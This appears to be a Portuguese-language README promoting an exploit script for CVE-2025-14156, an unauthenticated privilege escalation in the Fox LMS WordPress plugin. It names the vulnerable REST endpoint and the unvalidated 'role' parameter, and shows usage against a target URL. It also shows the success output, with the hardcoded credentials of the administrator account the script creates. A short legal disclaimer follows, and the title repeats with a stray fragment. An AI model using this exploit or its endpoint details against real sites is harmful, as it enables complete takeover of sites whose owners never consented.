
Fox LMS – WordPress LMS Plugin 1.0.4.7 - 1.0.5.1 - Escalação de Privilégio não Autenticada via 'createOrder'
Fox LMS – WordPress LMS Plugin 1.0.4.7 - 1.0.5.1 - Escalação de Privilégio Não Autenticada via 'createOrder'
Fox LMS – WordPress LMS Plugin (v1.0.4.7 a v1.0.5.1) – Escalação de Privilégio Não Autenticada via createOrder
Todas as versões até e incluindo 1.0.5.1 do Fox LMS para WordPress são vulneráveis à escalação de privilégio. O endpoint da API REST /fox-lms/v1/payments/create-order não valida corretamente o parâmetro 'role' ao criar novos usuários, permitindo que atacantes não autenticados criem contas com papéis arbitrários, incluindo Administrador.
CVE: CVE-2025-14156
Pontuação CVSS: 9.8 (Crítico)
Risco: Comprometimento completo do site.
CVE-2025-14156.py
python CVE-2025-14156.py -help
usage: CVE-2025-14156.py [-h] -u URL
CVE-2025-14156 Exploit By: Nxploited | Telegram: @Nxploited | Github: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g. https://victim.site)
python CVE-2025-14156.py -u https://victim.site
Após uma exploração bem-sucedida, o script exibirá apenas:
[+] Exploit Successful!
Username: nxploited
Password: Nxploited@2025Strong
Se a exploração falhar, apenas uma mensagem de erro concisa será exibida.
'administrator'.Esta ferramenta é apenas para fins educacionais e de teste autorizado. Qualquer uso não autorizado contra sistemas sem permissão explícita é ilegal. O autor não é responsável por uso indevido, danos ou consequências legais resultantes do uso deste script. Sempre siga práticas de divulgação responsável e certifique-se de ter autorização por escrito antes de testar qualquer alvo.
Telegram: @Nxploited
Github: Nxploited